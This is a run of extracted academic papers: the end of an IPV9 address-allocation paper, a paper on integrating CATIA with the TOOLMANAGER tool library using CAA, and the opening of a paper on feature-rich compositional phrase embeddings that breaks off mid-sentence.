corresponding character length. When the class number is 7, the address length is an unfixed bit, represented by the corresponding decimal length or the corresponding character length. V. ALLOCATION OF ADDRESS PACE Specific types of IPV9 addresses are identified by the high boot bit field in the address. The length of these boot bit fields varies. In the protocol, they are called the format prefix FP. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 36 TABLE II. IPV9 ADDRESS FORMAT PREFIX 1 Format prefix FP (n bits) Address (256-n bits) TABLE III. IPV9 ADDRESS FORMAT PREFIX 2 Format prefix FP (n bits) Address (2048-n bits) The following is an overview of the various address type prefixes. TABLE IV. IPV9 ADDRESS FORMAT PREFIX FOR THE ORIGINAL ALLOCATION TABLE Address type Format prefix (binary code) Format prefix (decimal code range) Proportion of address space 1 Reserved address 0000 0000 00 0——4194303 1/1024 2 Unassigned address 0000 0000 01 4194304——8388607 1/1024 3 IPV9 Decimal Network Working Group 0000 0000 1 8388608——16777215 1/512 4 IPX reserved address 0000 0001 0 16777216——25165823 1/512 5 Unassigned address segment 0000 0001 1 25165824——33554431 1/512 6 Unassigned address segment 0000 0010 33554432——50331647 1/256 7 Unassigned address segment 0000 0011 50331648——67108863 1/256 8 Unassigned address segment 0000 0100 67108864——83886079 1/256 9 Unassigned address segment 0000 0101 83886080—100663295 1/256 10 Unassigned address segment 0000 011 100663296— 134217727 1/128 11 Unassigned address segment 0000 1 0 134217728—201326591 1/ 64 12 Unassigned address segment 000 0 1 1 201326592—268435455 1/ 64 13 Unassigned address segment 0001 0 268435456—402653183 1/32 14 Unassigned address segment 00 0 1 1 402653184—536870911 1/32 15 Unassigned address segment 0010 0 536870912—671088639 1/32 16 Unassigned address segment 001 0 1 671088640—805306367 1/32 17 Unassigned address segment 0011 805306368—1073741823 1/ 16 18 Aggregable global unicast address 0100 1073741824—1342177279 1/16 19 Unassigned address segment 0101 1342177280-1610612735 1/16 20 Unassigned address segment 011 1610612736—2147483647 1/ 8 21 Geographical area unicast address 100 2147483648—2684354559 1/ 8 22 Geographical area unicast address 10 1 2684354560—3221225471 1/ 8 23 Unassigned address segment 1100 3221225472—3489660927 1/16 24 Unassigned address segment 1101 3489660928—3758096383 1/16 25 Unassigned address segment 1110 0 3758096384—3892314111 1/32 26 Unassigned address segment 1110 10 3892314112—3959422975 1/64 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 37 27 Unassigned address segment 1110 11 3959422976—4026531839 1/64 28 Unassigned address segment 1111 00 4026531840—4093640703 1/64 29 Unassigned address segment 1111 01 0 4093640704—4127195135 1/ 128 30 Unassigned address segment 1111 01 1 4127195136—4160749567 1/ 128 31 Unassigned address segment 1111 100 4160749568—4194303999 1/ 128 32 Unassigned address segment 1111 1010 4194304000—4211081215 1/256 33 Unassigned address segment 1111 1011 4211081216—4227858431 1/256 34 Unassigned address segment 1111 1100 4227858432—4244635647 1/256 35 Unassigned address segment 1111 1101 4244635648—4261412863 1/256 36 Unassigned address segment 1111 1110 4261412864—4278190079 1/256 37 Unassigned address segment 1111 1111 0 4278190080—4286578687 1/512 38 Unassigned address segment 1111 1111 100 4286578688—4288675839 1/2048 39 Local link unary address 1111 1111 1010 4288675840—4289724415 1/4096 40 Station single address 1111 1111 1011 4289724416—4290772991 1/4096 41 Multi-address 1111 1111 11 4290772992—4294967295 1/1024 42 Full decimal address 0 0 — 10 512 0 — 10 512 The aggregate global unary address and the cluster address belong to the unary address, they do not have any difference in form, only in the propagation mode of the message is different. Therefore, the same format prefix 0100 is used for the polymerizable monocular and cluster address assignments. The proposed network vendor monocular addresses and geographic area monocular addresses are merged into a polymerizable monocular address. Both the local link unary address and the station unary address are used in the local scope. In order to facilitate the router to speed up the identification of these two kinds of addresses, two address format prefixes, 1111 1111 1010 and 1111 1111 1011, were assigned to them respectively. Because the processing method of multi-destination address on the router and host is quite different from the processing method of single-destination address and cluster address, an address format prefix 1111 1111 11 was also assigned to the multi-destination address. The design also reserved address space for "decimal Internet address and domain name decision and allocation organization" and IPX address. The corresponding address format prefix is 0000 0000 1 and 0000 0001 0.Some special addresses of IPV9, such as unspecified addresses, local return addresses and ipv4-compatible addresses, are prefixed by 0000 0000 00 as the address format. Due to the length of this article, only the address format in the IPV9 address architecture is described in detail. For more knowledge of IPV9, please refer to the related articles. VI. THE CONCLUSION IPV9 is the core and key technology of the next generation Internet. In this paper, IPV9 address coding is researched and a new address coding is proposed.IPV9 increases the length of IP addresses from 32 bits and 128 bits to 2048 bits, and the default is 256 bits, to support more address hierarchies, more addressable nodes, and simpler automatic address configurations. In order to reduce the network overhead, the fixed location method is adopted, International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 38 changed the encoding of header options to allow more efficient forwarding. Reduce restrictions on option length for greater flexibility in introducing new options in the future. IPV9 adds expansionary support for IP address encryption and authentication, data integrity, and data privacy (optional). The new network address is not only the update and upgrade of the old network address, but also a brand new Internet system structure, which has laid a solid foundation for promoting the extensive application and integrated development of Internet and Internet of things. INTRODUCTION OF XIE JIANPING Xie Jianping, male, was born in Shanghai, China in 1951. He is a Chinese expert in the International Standards Organization (ISO/IEC JTC1/SO6). As the "decimal network standard working group" and "Electronic Labeling Standard Working Group Data Format Group" of the Ministry of Industry and Information Technology of the People's Republic of China, the "New Generation Security Controllable Information Network Technology Platform Overall Design" expert group and the Internet of Things Joint Standards Working Group Leader of the team. It is also the main editor of the ISO/C6 "Future Network naming and addressing" Chinese member. Professor Xie has obtained more than 90 multinational patents. The patents on network resources, terminal equipment, networks transmission and information platform include "Methods for allocating addresses to computers using Internet with full digital codes" and "Methods for allocating computer addresses with all-decimal algorithms for networked computers", "Method and apparatus for implementing trusted network connection through a router or switch", "Method for uniformly compiling and allocating addresses of networked computers and intelligent terminals", "Decimal Gateway", "An IPV9/IPV4 NAT Router", "An IPV9 Website Browser Plugin", "A new generation of IPV9 routers", "A Networked Tax Control System and Its Method" and "Digital Remote Video Surveillance System Device" REFERENCE [1] Xie Jianping etc. A method of ssigning addresses to network computers using the full decimal algorithm[P]. CN: ZL00135182.6, 2004.2.6. [2] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [3] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [4] RFC – Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [5] P. Srisuresh. Network Working Group. IP Network Address Translator (NAT) Terminology and Considerations. RFC-2663, 1999.8. [6] V. Fuller. Network Working Group. Classless Inter-domain Routing (CIDR):The Internet Address Assignment and Aggregation Plan. RFC-4632, 2006.8. [7] Ross Callon. TCP and UDP with Bigger Addresses (TUBA), A Simple Proposal for Internet Addressing and Routing. RFC-1347, 1992.6. work_rhds7awthngdzlh5allgvhl7bi ---- Your Paper's Title Starts Here: Please Center International Journal of Advanced Network, Monitoring, and Controls Vol. 1, No. 1, 2016 130 Research of Integration Technology between CATIA and TOOLMANAGER Based on CAA Li Yihui 1 1 Xi'an High Voltage Apparatus Research Institute Co., Ltd. / Xi Dian Group, Xi’an, China, liyh@xihari.com Abstract: In order to implement the integration of the tool libraries from CATIA and the tool database, CATIA software was further developed using CAA. CAA macro-based integration project about the two libraries is proposed, and the development process is presented. In CAA environment provided by CATIA, though further developed using CAA, calling for information, converting information and valuating information of CATIA and TOOLMANAGER were researched. Finally, the dynamic calling, association and driving of CATIA-based tool information were implemented successfully. Keywords: CATIA, TOOLMANAGER, Tool library, CAA Introduction: CATIA is a CAD/CAE/CAM integration software of French Dassault Systems, which can provides users an integrated digital environment and complexity requirements for users from design to manufacture [1]. CATIA provides a 2.5-axis, 3-axis and multi-axis CNC machining modules. Users can compile NC programming using CATIA, both can call a tool from CATIA tool library, and can manually enter the parameters to create the tool [2]. To manage the growing types of knives, many enterprises generally use a professional tool management system, such as TOOLMANAGER software which is a highly integrated tool information management system developed by German company. It can effectively manage the tool component, tool components, machine setting bills, tool map and tool supplier information. The tool library mainly offer help for managing tools for the tool room staffs, and facilitate the staffing process three-dimensional technology and CNC programming. CATIA has powerful CNC machining modules. The basic operation methods of CNC machining include setting processing elements, setting the tool path, setting tool parameters, setting feed / back knife, cutting simulation and generating NC programs. Selecting tool is very important in the NC content, for each machining operation needs to specify a processing tool. At present, in the enterprises tool management, the users use the tool and maintain it themselves for each business unit, and users can not exchange of information and share data. For example, during the CNC programming, staff use CATIA tool management functions and redefine their own tool models and data. The NC programming staff cannot get the latest stock information and use of information, resulting in not purchasing the tool to affect the production cycle. NC programmers do not know the information has resulted in inconsistencies in tool selection, and increased manufacturing costs. With the product mix changes and adjustments, the types and specifications of the tool will continue to change purchased by machinery processing enterprises. If the CNC staff cannot grasp the information of existing enterprise tool, use the tools which do not match the existing tools, will lead to the applicability of NC program reduced, seriously affecting the production schedule. Therefore, achieving the integration of CATIA tool and business management tool is very important. International Journal of Advanced Network, Monitoring, and Controls Vol. 1, No. 1, 2016 131 Therefore, we studied the CATIA integration technology of tool library. Basing on an enterprise digital manufacturing, CATIA software is further developed using Component Application Architecture (CAA), and dynamic integration of CATIA and TOOLMANAGER tool library is achieved, and it has been successfully applied in the enterprise [3]. The CNC staff can call tool directly from CATIA tool library, and can grasp the company's existing tools, and improve the efficiency of CNC programming, and ensure the applicability of CNC code. It provides a good basis for successful implementation of digital manufacturing system. 1. A Further Developing Method for CATIA As powerful engineering software, CATIA has a strong opening performance. Users can follow their own needs, using different ways to the development in various degrees. CATIA secondary development interface communication with external interface is in two ways: in-process applications approach and out-process applications approach. In in-process applications, CATIA software and scripts to run in the same process address space, such as macro (Macro) mode. In the CATIA environment, the menu record Macro, and generate VB Script sequence. When the macro starts running, CATIA is in a non-activated and variables cannot be stored between calling macro. This relatively simple approach can be completed in the CATIA environment. In out- process applications, CATIA and external applications run in different process address space. In the case of CATIA running, external process control CATIA through the interface, it can create and modify CATIA environment and geometry data, size, etc. It can also support Object Linking and Embedding. Specifically, there are two main ways to CATIA secondary development: using a macro to the second development and using of CATIA component application architecture (CAA) to the further development [4,5]. 1.1Using a macro to the further development Users use macro recording a series of operation, automatically generated code, and use VBScript as editing tools, it is a customized interactive way. CATIA provides CATIA Automation API for VBScript on the secondary development, Automation API has the ability to communicate with any OLE-compatible platform, Automation interface can call "InputBox" and "MsgBox" function to get user input information and output [6]. For NT users, you can apply more complex Visual Basic to define the input and output interfaces. An icon can be associated with a macro in running, and be into CATIA display frames. The characteristics of using the macro to the further development of CATIA are convenient, not only to achieve the desired function, but also to record the macro method and obtain the required procedures. But the disadvantage is that CATIA cannot perform other operations when the macro is running. The function need be achieved was limited. 1.2. Using the component application architecture (CAA) on the further development of CATIA [7,8] CAA is an acronym Component Application Architecture, is a platform of Dassault Systems, International Journal of Advanced Network, Monitoring, and Controls Vol. 1, No. 1, 2016 132 which expanding products and customizing and developing for customers. It uses object-oriented programming language; object-oriented programming (Object-Oriented- Programming, OOP) has become mainstream in the field of software development and design. CAA's development can be seen as a combination and expansion of its component objects. CAA uses COM technology and OLE technology, COM as a software architecture has a better module independence, scalability, making it easier to CAA programming and become standardized, so that the code more concise. In the support of the CAA structure, Dassault Systems as can be established as the building block, this structure is very suitable for the growth and development of the system. CATIA uses CAA on the further development, its benefits are: reusability, abstraction, encapsulation, etc. However, the complexity of Dassault Systems and depth involved in the content of CAA itself, the second development using CAA must have some complexity and difficulty. Users familiar with the relevant application system of Dassault Systems, they must also have basic knowledge of software development, the basic programming skills of C + + (or Java), COM technology, etc. 2. Integration of CATIA Tool Library Using a Macro 2.1. Scheme of integrated tool library In order to achieving integration, when NC program was written and executed tool selection function, CATIA tool class and the subordinate TOOLMANAGER class can be list [9]. On the other hand, CATIA to be able to dynamically query the tool data in TOOLMANAGER and the selected tool can be returned to the CATIA environment, finally parameterization drive tool graphics. When NC machining tool is selected using CATIA, the view of the tool data is the dynamic tool library, it can realize integration of CATIA and TOOLMANAGER. The integration above mainly is to call tool from TOOLMANAGER tool Library, and then assign the property value of tool to CATIA NC machining tool module model. The use of macros in the implementation for the further development cannot call the CATIA function. Though further developed using CAA, calling for information, converting information and valuating information of CATIA and TOOLMANAGER is researched, finally, the dynamic calling, association and driving of CATIA-based tool information is implemented successfully [10]. Fig.1 shows the Tool library integrated solution. International Journal of Advanced Network, Monitoring, and Controls Vol. 1, No. 1, 2016 133 Fig.1. Tool library integrated solution. 2.2. Development process of the integrated tool library To ensure the integrity and accuracy of tool information in library TOOLMANAGER tool library, and NC programmers can select the needed tool, before carrying out an integrated development tool, the description field for each type of tool in TOOLMANAGER tool library must be sorted combining with enterprise tool existing type for tools, and make it fit the classes and attributes of CATIA tool. To make CATIA tool class and TOOLMANAGER class correspond, Because CATIA tool that can add new classes, we need to complete further development of CATIA. The development process is as follows: (i)The corresponding file in CATIA V5 R16 ------ \ Program Files \ Dassault Systemes\ B16 \ intel_a \ resources \ graphic replaced by *. feat file in FEAT folder. (ii)Use WordPad to open MfgUserAttributes.xml in CATIA V5 R16------\ Program Files \ Dassault Systemes \ B16 \ intel_a \ startup \ Manufacturing \ Samples, and modify the file contents in the second row: Results are as follows: <!DOCTYPE CATSpecs SYSTEM"D:\ProgramFiles\DassaultSystemes\B16\intel_a\resources\dtd\MfgUserAttributes.dtd" >.In this document, we can add tool properties in accordance with the provisions meaning of the field. (iii)Start WINDOWS/system32/cmd.exe:Run MfgResourceAttr.exe in the test folder, compile MfgUserAttibutes.xml in \Program Files\Dassault Systemes\B16\ intel_a\startup\Manufacturing\ Samples directory, and add tool properties to Manufacturing Resources Extensions. Feat and Manufacturing Literals. feat, and complete the tool additional properties. The additional Properties of tool are the basis of building this module. 3. Implementation of Integrated International Journal of Advanced Network, Monitoring, and Controls Vol. 1, No. 1, 2016 134 Combining with actual situation of enterprises, this paper use the method of developing macro to make the second development of the CATIA, and achieve integration of CATIA tool and enterprise tool database, the following is system operation interface. The CATIA tool dynamic calling data and driving module has two main functions: Tool data call function: According to the selected class of tool dynamic call tool data tool. Tool data-driven features: basing on the selected tool, drive the parameters graphics and toolparameters. The use as follows: First, start the CATIA V5 R16, into the CNC machining module, select the required CNC machining tool, and then start the tool selection interface, finally implement the integration of two software. Conclusion We studied a technology of integration research tool library of CATIA in Shaanxi scientific technology research project, which is named discrete manufacturing enterprise decision support system based on heterogeneous information integration(project no:2010K01-068). Tool database creating theory and structure of CATIA were analyzed. CATIA secondary development methods were compared and studied. The methods of CATIA integrated tool database using of macro were proposed. Combining with the actual situation of business, the software module is realizing integrated of CATIA tool library. The successful integration of CATIA tool database and tool library can supply service as follows: (i)For NC programming, directly select tool from CATIA tool library, greatly reducing the work of the NC programmer to set parameters of the tool, improving the efficiency of NC programming. (ii)The integrating of CATIA tool library, it makes tool selected by NC programming closely link to the production site tool, ensuring the applicability of NC program. (iii)Improve automation of the enterprise digital manufacturing system and degree of integration. This work was supported by Shaanxi Provincial scientific and technological research projects under Grant Nos. DF0102110401. References [1]Jacques F. Delacur, OPTIS, and Jean-Luc Cuinier, Presentation of the First PLM Integrated Optical Simulation Software for the Design and Engineering of Optical Systems, Proceedings of SPIE---the International Society for Optics and Photonics, St. Etienne, France, vol. 5249, 2004, pp. 42–53. [2]Xu Pengcheng, The Road of Digital Manufacturing System, Aeronautical Manufacturing Technology, vol. 05, 2007, pp. 68–71. International Journal of Advanced Network, Monitoring, and Controls Vol. 1, No. 1, 2016 135 [3]Dong Yixin, Xi Ping, Secondary Development of CATIA Interface, Aeronautical Manufacturing Technology, vol. 12, 2006, pp. 83–86. [4]Dong Yixin, Xi Ping, The Movement Simulator of Five-axis NC Machine Based on Secondary Development of CATIA, Mechanical Engineer, vol. 03, 2005, pp. 41–43. [5]Chen Ming, Deng Shifu, Zhu Rui, and Zhou Laishui, CAD/CAE Integration Based on CATIA Platform, Journal of Computer-Aided Design & Computer Graphics, vol. 18, 2006, pp. 1078– 1082. [6]Deng Dongmei, Zhou Laishui, Chen Gong, An Luling, and Li Wei, Design and Implementation of CATIA-Based Construction Tool for Component Library, Journal of South China University of Technology, vol. 35, 2007, pp. 138–142. [7]Wang Su, Chen Nanfei, Zhu Yuming, and Zhu Xinxiong, CATIA-based Modeling Method for Object Made of Functionally Gradient Materials, China Mechanical Engineering, vol. 18, 2007, pp. 454–456. [8]Yang Liuhui, Zhang Heming, Research and Application of COM-Based Product Information Integration in CATIA Environment, Computer Engineering and Applications, vol. 24, 2001, pp. 132–134. [9]Guo Zhe, Zang Shunlai, Wei Gongji, Chen Feng, and Guo Cheng, Secondary Development Technology of CATIA V5 and Its Application in Design of Stamping Dies, Die & Mould Industry, vol. 32, 2006, pp. 1–4. [10]Li Wei, Zhang Yongyan, Development and Application of Conversion Software of NC Program Based on CATIA, Aeronautical Manufacturing Technology, vol. 02, 2001, pp. 55–57. work_riaql7nykvgypmnszeqnlhdrlu ---- Learning Composition Models for Phrase Embeddings Mo Yu Machine Intelligence & Translation Lab Harbin Institute of Technology Harbin, China gflfof@gmail.com Mark Dredze Human Language Technology Center of Excellence Center for Language and Speech Processing Johns Hopkins University Baltimore, MD, 21218 mdredze@cs.jhu.edu Abstract Lexical embeddings can serve as useful rep- resentations for words for a variety of NLP tasks, but learning embeddings for phrases can be challenging. While separate embeddings are learned for each word, this is infeasible for every phrase. We construct phrase em- beddings by learning how to compose word embeddings using features that capture phrase structure and context. We propose efficient unsupervised and task-specific learning objec- tives that scale our model to large datasets. We demonstrate improvements on both language modeling and several phrase semantic simi- larity tasks with various phrase lengths. We make the implementation of our model and the datasets available for general use. 1 Introduction Word embeddings learned by neural language mod- els (Bengio et al., 2003; Collobert and Weston, 2008; Mikolov et al., 2013b) have been success- fully applied to a range of tasks, including syn- tax (Collobert and Weston, 2008; Turian et al., 2010; Collobert, 2011) and semantics (Huang et al., 2012; Socher et al., 2013b; Hermann et al., 2014). However, phrases are critical for capturing lexical meaning for many tasks. For example, Collobert and Weston (2008) showed that word embeddings yielded state-of-the-art systems on word-oriented tasks (POS, NER) but performance on phrase ori- ented tasks, such as SRL, lags behind. We propose a new method for compositional se- mantics that learns to compose word embeddings into phrases. In contrast to a common approach to phrase embeddings that uses pre-defined compo- sition operators (Mitchell and Lapata, 2008), e.g., component-wise sum/multiplication, we learn com- position functions that rely on phrase structure and context. Other work on learning compositions relies on matrices/tensors as transformations (Socher et al., 2011; Socher et al., 2013a; Hermann and Blun- som, 2013; Baroni and Zamparelli, 2010; Socher et al., 2012; Grefenstette et al., 2013). However, this work suffers from two primary disadvantages. First, these methods have high computational complexity for dense embeddings: O(d2) or O(d3) for compos- ing every two components with d dimensions. The high computational complexity restricts these meth- ods to use very low-dimensional embeddings (25 or 50). While low-dimensional embeddings perform well for syntax (Socher et al., 2013a) and sentiment (Socher et al., 2013b) tasks, they do poorly on se- mantic tasks. Second, because of the complexity, they use supervised training with small task-specific datasets. An exception is the unsupervised objec- tive of recursive auto-encoders (Socher et al., 2011). Yet this work cannot utilize contextual features of phrases and still poses scaling challenges. In this work we propose a novel compositional transformation called the Feature-rich Composi- tional Transformation (FCT) model. FCT produces phrases from their word components. In contrast to previous work, our approach to phrase composi- tion can efficiently utilize high dimensional embed- dings (e.g. d = 200) with an unsupervised objective, both of which are critical to doing well on seman- tics tasks. Our composition function is parameter- 227 Transactions of the Association for Computational Linguistics, vol. 3, pp. 227–242, 2015. Action Editor: Joakim Nivre. Submission batch: 2/2015; Revision batch 4/2015; Published 5/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. ized to allow the inclusion of features based on the phrase structure and contextual information, includ- ing positional indicators of the word components. The phrase composition is a weighted summation of embeddings of component words, where the sum- mation weights are defined by the features, which allows for fast composition. We discuss a range of training settings for FCT. For tasks with labeled data, we utilize task-specific training. We begin with embeddings trained on raw text and then learn compositional phrase parameters as well as fine-tune the embeddings for the specific task’s objective. For tasks with unlabeled data (e.g. most semantic tasks) we can train on a large corpus of unlabeled data. For tasks with both labeled and unlabeled data, we consider a joint training scheme. Our model’s efficiency ensures we can incorporate large amounts of unlabeled data, which helps miti- gate over-fitting and increases vocabulary coverage. We begin with a presentation of FCT (§2), includ- ing our proposed features for the model. We then present three training settings (§3) that cover lan- guage modeling (unsupervised), task-specific train- ing (supervised), and joint (semi-supervised) set- tings. The remainder of the paper is devoted to eval- uation of each of these settings. 2 Feature-rich Compositional Transformations from Words to Phrases We learn transformations for composing phrase em- beddings from the component words based on ex- tracted features from a phrase, where we assume that the phrase boundaries are given. The result- ing phrase embedding is based on a per-dimension weighted average of the component phrases. Con- sider the example of base noun phrases (NP), a com- mon phrase type which we want to compose. Base NPs often have flat structures – all words modify the head noun – which means that our transformation should favor the head noun in the composed phrase embedding. For each of the N words wi in phrase p we construct the embedding: ep = N∑ i λi �ewi (1) where ewi is the embedding for word i; and � refers to point-wise product. λi is a weight vector that is constructed based on the features of p and the model parameters: λij = ∑ k αjkfk(wi,p) + bij (2) where fk(wi,p) is a feature function that considers word wi in phrase p and bij is a bias term. This model is fast to train since it has only linear transfor- mations: the only operations are vector summation and inner product. Therefore, we learn the model parameters α together with the embeddings. We call this the Feature-rich Compositional Transformation (FCT) model. Consider some example phrases and associated features. The phrase “the museum” should have an embedding nearly identical to “museum” since “the” has minimal impact the phrase’s meaning. This can be captured through part-of-speech (POS) tags, where a tag of DT on “the” will lead to λi ≈ ~0, removing its impact on the phrase embedding. In some cases, words will have specific behaviors. In the phrase “historic museum”, the word “historic” should impact the phrase embedding to be closer to “landmark”. To capture this behavior we add smoothed lexical features, where smoothing reduces data sparsity effects. These features can be based on word clusters, themselves induced from pre-trained word embeddings. Our feature templates are shown in Table 1. Phrase boundaries, tags and heads are identified us- ing existing parsers or from Annotated Gigaword (Napoles et al., 2012) as described in Section 5. In Eq. (1), we do not limit phrase structure though the features in Table 1 tend to assume a flat structure. However, with additional features the model could handle longer phrases with hierarchical structures, and adding these features does not change our model or training objectives. Following the semantic tasks used for evaluation we experimented with base NPs (including both bigram NPs and longer ones). We leave explorations of features for complex structures to future work. FCT has two sets of parameters: one is the fea- ture weights (α,b), the other is word embeddings (ew). We could directly use the word embeddings learned by neural language models. However, our experiments show that those word embeddings are often not suited for FCT. Therefore we propose to 228 Simple Features Compound Features POS tags t(wi−1), t(wi), t(wi+1) < t(wk), t(wk+1) > k ∈{i−1, i} Word clusters c(wi−1), c(wi), c(wi+1) < c(wk),c(wk+1) > k ∈{i−1, i} wi−1, wi, wi+1 if wi is function word Head word I[i = h] < t(wk),I[i = h] > k ∈{i−1, i, i + 1} < c(wk),I[i = h] > k ∈{i−1, i, i + 1} Distance from head Dis(h− i) < t(wk),Dis(h− i) > k ∈{i−1, i, i + 1} < c(wk),Dis(h− i) > k ∈{i−1, i, i + 1} Head tag/cluster t(wh),c(wh) if i 6= h < t(wh), t(wi) >,< c(wh),c(wi) > if i 6= h Table 1: Feature templates for word wi in phrase p. t(w): POS tag; c(w): word cluster (when w is a function word, i.e. a preposition word or conjunction word, there is no need to have smoothed version of the word features based on clusters. Therefore we directly use the word forms as features as shown in line 3 of the table); h: position of head word of the phrase p; Dis(i−j): distance between wi and wj (distance in tokens). < f1,f2 > refers to the conjunction (i.e. Cartesian product) between two feature templates f1 and f2. learn both the feature weights and the word embed- dings with objectives in Section 3. Moreover, ex- periments show that starting with the baseline word embeddings leads to better learning results compar- ing to random initializations. Therefore in the rest of the paper, if not specifically mentioned, we always initialize the embeddings of FCT with baseline word embeddings learned by Mikolov et al. (2013b). 3 Training Objectives The speed and flexibility of FCT enables a range of training settings. We consider standard unsu- pervised training (language modeling), task-specific training and joint objectives. 3.1 Language Modeling For unsupervised training on large scale raw texts (language modeling) we train FCT so that phrase em- beddings – as composed in Section 2 – predict con- textual words, an extension of the skip-gram objec- tive (Mikolov et al., 2013b) to phrases. For each phrase pi = (wi1, ...,win) ∈ P,wij ∈ V , where P is the set of all phrases and V is the word vocabu- lary. Here i is the index of a phrase in set P and ij is the absolute index of the jth component word of pi in the sentence. For predicting the c words to the left and right the skip-gram objective becomes: max α,b,ew,e′w 1 |P| |P|∑ i=1   ∑ 0<j≤c log P ( e′wi1−j |epi ) + ∑ 0<j≤c log P ( e′win+j|epi )   , where P(e′w|epi) = exp ( e′w T epi ) ∑ w′∈V exp ( e′w′ T epi ), (3) where α,b,ew are parameters (the word embed- dings ew become parameters when fine-tuning is en- abled) of FCT model defined in Section 2. As is com- mon practice, when predicting the context words we use a second set of embeddings e′w called output em- beddings (Mikolov et al., 2013b). During training FCT parameters (α,b) and word embeddings (ew and e′w) are updated via back-propagation. epi is the phrase embedding defined in Eq. (1). wi1−j is the j-th word before phrase pi and win+j is the j-th word after pi. We can use negative sampling based Noise Contrastive Estimation (NCE) or hierarchical softmax training (HS) in (Mikolov et al., 2013b) to deal with the large output space. We refer to this objective as the language modeling (LM) objective. 3.2 Task-specific Training When we have a task for which we want to learn embeddings, we can utilize task-specific training of the model parameters. Consider the case where we wish to use phrase embeddings produced by FCT in a classification task, where the goal is to determine whether a phrase ps is semantically similar to a can- didate phrase (or word) pi. For a phrase ps and a set of candidate phrases {pi,yi}N1 , yi = 1 indicates se- mantic similarity of ps and pi and yi = 0 otherwise, 229 we use a classification objective: max α,b,ew ∑ ps N∑ i=1 yi log P(yi = 1|ps,pi) = max α,b,ew ∑ ps N∑ i=1 yi log exp ( eps Tepi ) ∑N j exp ( eps Tepj ). (4) where ep is the phrase embedding from Eq. (1). When a candidate phrase pi is a single word, a lex- ical embedding can be used directly to derive epi . When N = 1 for each ps, i.e., we are working on binary classification problems, the objective will re- duce to logistic loss and a bias b will be added. For very large sets, e.g., the whole vocabulary, we use NCE to approximate the objective. We call Eq. (4) the task-specific (TASK-SPEC) objective. In addition to updating only the FCT parameters, we can update the embeddings themselves to im- prove the task-specific objective. We use the fine- tuning strategy (Collobert and Weston, 2008; Socher et al., 2013a) for learning task-specific word embed- dings, first training FCT and the embeddings with the LM objective and then fine-tuning the word em- beddings using labeled data for the target task. We refer to this process as “fine-tuning word emb” in the experiment session. Note that fine tuning can be also applied to baseline word embeddings trained with the TASK-SPEC objective or the LM objective above. 3.3 Joint Training While labeled data is the most helpful for train- ing FCT for a task, relying on labeled data alone will yield limited improvements: labeled data has low coverage of the vocabulary, which can lead to over-fitting when we update FCT model parameters Eq. (4) and fine-tune word embeddings. In particu- lar, the effects of fine-tuning word embeddings are usually limited in NLP applications. In contrast to other applications, like vision, where a single input can cover most or all of the model parameters, word embeddings are unique to each word, so a word will have its embedding updated only when the word ap- pears in a training instance. As a result, only words that appear in the labeled data will benefit from fine- tuning and, by changing only part of the embedding space, the performance may be worse overall. Language modeling provides a method to update all embeddings based on a large unlabeled corpus. Therefore, we combine the language modeling ob- ject (Eq. (3)) and the task-specific object (Eq. (4)) to yield a joint objective. When a word’s embedding is changed in a task-specific way, it will impact the rest of the embedding space through the LM objective. Thus, all words can benefit from the task-specific training. We call this the joint objective and call the re- sulted model FCT-Joint (FCT-J for short), since it up- dates the embeddings with both the LM and TASK- SPEC objectives. In addition to jointly training both objectives, we can create a pipeline. First, we train FCT with the LM objective. We then fine-tune all the parameters with the TASK-SPEC objective. We call this FCT-Pipeline (FCT-P for short). 3.4 Applications to Other Phrase Composition Models While our focus is the training of FCT, we note that the above training objectives can be applied to other composition models as well. As an example, consider a recursive neural network (RNN) (Socher et al., 2011; Socher et al., 2013a), which recur- sively computes phrase embeddings based on the bi- nary sub-tree associated with the phrase with matrix transformations. For the bigram phrases considered in the evaluation tasks, suppose we are given phrase p = (w1,w2). The model then computes the phrase embedding ep as: ep = σ (W · [ew1 : ew2]) , (5) where [ew1 : ew2] is the concatenation of two em- bedding vectors. W is a matrix of parameters to be learned, which can be further refined according to the labels of the children. Back-propagation can be used to update the parameter matrix W and the word embeddings during training. It is possible to train the RNN parameters W with our TASK-SPEC or LM objective: given syntactic trees, we can use RNN (instead of FCT) to compute phrase embeddings ep, which can be used to compute the objective, and then have W updated via back-propagation. The ex- periments below show results for this method, which we call RNN, with TASK-SPEC training. However, 230 while we can train RNNs using small amounts of la- beled data, it is impractical to scale it to large cor- pora (i.e. LM training). In contrast, FCT easily scales to large corpora. Remark (comparison between FCT and RNN): Besides efficiency, our FCT is also expressive. A common approach to composition, a weighted sum of the embeddings (which we include in our experi- ments as Weighted SUM), is a special case of FCT with no non-lexical features, and a special case of RNN if we restrict the W matrix of RNN to be di- agonal. Therefore, RNN and FCT can be viewed as two different ways of improving the expressive strength of Weighted SUM. The RNNs increase expressiveness by making the transformation a full matrix (more complex but less efficient), which does not introduce any interaction between one word and its contexts.1 On the other hand, FCT can make the transformation for one word depend on its context words by extracting relevant features, while keeping the model linear. As supported by the experimental results, our method for increasing expressiveness is more effec- tive, because the contextual information is critical for phrase compositions. By comparison, the ma- trix transformations in RNNs may be unnecessarily complicated and are not significantly more helpful in modeling the target tasks and make the models more likely to over-fit. 4 Parameter Estimation Training of FCT can be easily accomplished by stochastic gradient descent (SGD). While SGD is fast, training with the LM or joint objectives re- quires the learning algorithm to scale to large cor- pora, which can be slow even for SGD. Asynchronous SGD for FCT: We use the dis- tributed asynchronous SGD-based algorithm from Mikolov et al. (2013b). The shared embeddings are updated by each thread based on training data within the thread independently. With word embeddings, the collision rate is low since it is unlikely that dif- ferent threads will update the same word at the same 1As will be discussed in the related work session, there do exist some more expressive extensions of RNN, which can ex- ploit the interaction between a word and its contexts. time. However, adding training of FCT to this setup introduces a problem; the shared feature weights α in the phrase composition models have a much higher collision rate. To prevent conflicts, we mod- ify asynchronous SGD so that only a single thread updates both α and lexical embeddings simultane- ously, while the remaining threads only update the lexical embeddings. When training with the LM ob- jective, only a single (arbitrarily chosen) thread can update FCT feature weights; all other threads treat them as fixed during back-propagation. While this reduces the data available for training FCT parame- ters to only that of a single thread, the small number of parameters α means that even 